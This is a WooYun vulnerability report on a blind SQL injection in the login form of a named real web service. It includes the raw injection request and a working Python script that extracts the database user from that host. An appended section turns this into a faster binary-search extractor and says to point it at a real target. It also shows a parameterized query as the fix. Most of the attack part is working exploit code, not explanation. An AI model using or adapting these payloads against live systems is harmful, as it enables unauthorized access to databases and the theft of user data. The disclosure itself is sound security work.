WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-07-06: Details reported to the vendor, awaiting vendor response
2015-07-07: Vendor confirmed; details disclosed to the vendor only
2015-07-17: Details disclosed to core white hats and relevant domain experts
2015-07-27: Details disclosed to regular white hats
2015-08-06: Details disclosed to intern white hats
2015-08-21: Details disclosed to the public
sqlmap cannot exploit this injection point, so a script is needed. It is a boolean-based blind SQL injection in the manufacturer.manufacturerName parameter of the login action: when the injected condition is true the response contains "该账户已经被删除" (this account has been deleted), and when it is false it does not, which is the only oracle available.
POST /manufacturer_login.action HTTP/1.1
Content-Length: 114
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://isv.chinac.com:80/manufacturer_tologin.action
Cookie: cookie_user=""; login_password=""; JSESSIONID=61822C830DCA9CD25D92FE92038A772E; mssxskgj=1
Host: isv.chinac.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

autoLogin=1&manufacturer.manufacturerName=-1' or length(user())=14 or 'n'='&manufacturer.password=g00dPa%24%24w0rD
When the condition is true (screenshot):
When the condition is false (screenshot):
length(user()) is 14 (screenshot):
Result of user() (screenshot):
Script:
# encoding=utf-8
# Boolean-based blind SQL injection against /manufacturer_login.action:
# recovers MySQL user() one character at a time through the
# manufacturer.manufacturerName parameter (ported from Python 2 to Python 3).
import http.client
import sys
import urllib.parse

HOST = 'isv.chinac.com'
PATH = '/manufacturer_login.action'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
# Candidate characters for each position of user(), e.g. root@localhost
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
# Field name as in the captured request (the original script had a typo, "passwor")
post_data = {"autoLogin": '1', "manufacturer.password": 'p'}

print('Start to retrieve MySQL user:\n')
user = ''
# length(user()) was confirmed to be 14 with the request above
for i in range(1, 15):
    for payload in payloads:
        print('.', end='', flush=True)
        conn = http.client.HTTPConnection(HOST, timeout=60)
        # True branch makes the server render the "account has been deleted" page
        s = "-1' or ascii(MID(user(),%d,1))=%s or 'n'=' " % (i, ord(payload))
        post_data["manufacturer.manufacturerName"] = s
        body = urllib.parse.urlencode(post_data)
        conn.request('POST', PATH, body, headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        if html_doc.find('该账户已经被删除') > 0:
            user += payload
            sys.stdout.write('\r[In Progress]' + user)
            sys.stdout.flush()
            break
print('\n[Done] MySQL user is %s' % user)
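As an added example, not part of the original report: the same boolean-blind technique generalized to a binary search over ascii(MID(user(),i,1)) (at most 8 probes per character instead of scanning up to 65 candidates), preceded by a binary search for length(user()) instead of guessing it. The target is a constructed SQLite stand-in for the vulnerable login action, with shims for MySQL's user(), MID() and ascii() so the report's exact payload syntax runs unchanged offline; the table name, the 'deleted' row, the simulated user name and the hardened_lookup method are assumptions, not anything from the site.

```python
import sqlite3

# Marker the true branch of the page's oracle contains ("this account has been deleted")
MARKER = '该账户已经被删除'


class SimulatedTarget:
    """Constructed stand-in for the vulnerable login action (not the real site).

    An in-memory SQLite database with small shims so MySQL's user(), MID() and
    ascii() resolve, letting the report's payloads run unchanged."""

    def __init__(self, db_user='root@localhost'):
        self.db = sqlite3.connect(':memory:')
        self.db.create_function('user', 0, lambda: db_user)
        self.db.create_function('MID', 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
        self.db.create_function('ascii', 1, lambda s: ord(s[0]) if s else 0)
        self.db.execute('CREATE TABLE manufacturer (manufacturerName TEXT, status TEXT)')
        self.db.execute("INSERT INTO manufacturer VALUES ('acme', 'deleted')")
        self.calls = 0  # number of HTTP requests the real attack would need

    def __call__(self, manufacturer_name):
        """Vulnerable lookup: the parameter is concatenated into the SQL string."""
        self.calls += 1
        sql = "SELECT status FROM manufacturer WHERE manufacturerName='%s'" % manufacturer_name
        rows = self.db.execute(sql).fetchall()
        return MARKER if rows and rows[0][0] == 'deleted' else '账户不存在'

    def hardened_lookup(self, manufacturer_name):
        """Same query with a bound parameter: the payload is only a literal name."""
        return self.db.execute(
            'SELECT status FROM manufacturer WHERE manufacturerName=?',
            (manufacturer_name,)).fetchall()


def condition_true(target, cond):
    """One boolean-blind probe, wrapped exactly as in the report: -1' or <cond> or 'n'='."""
    return MARKER in target("-1' or %s or 'n'='" % cond)


def blind_int(target, expr, lo=0, hi=255):
    """Recover an integer-valued SQL expression by binary search on `expr > mid`.

    Invariant: the true value lies in [lo, hi]; at most ceil(log2(hi - lo + 1)) probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if condition_true(target, '%s>%d' % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_user(target):
    """Length first (as the report's length(user())=14 check does), then each byte."""
    length = blind_int(target, 'length(user())', 0, 64)
    return ''.join(chr(blind_int(target, 'ascii(MID(user(),%d,1))' % i))
                   for i in range(1, length + 1))


if __name__ == '__main__':
    t = SimulatedTarget()
    print('MySQL user is %s after %d requests' % (extract_user(t), t.calls))
    print('hardened lookup with a payload returns', t.hardened_lookup("-1' or 1=1 or 'n'='"))
```

Against a real target, replace SimulatedTarget.__call__ with the HTTP POST from the script above and keep everything else; the request count shown by `calls` is what the linear scan in the original script would have spent on a single position.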
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-07-07 11:21
Thank you for your support. It is being handled.
None yet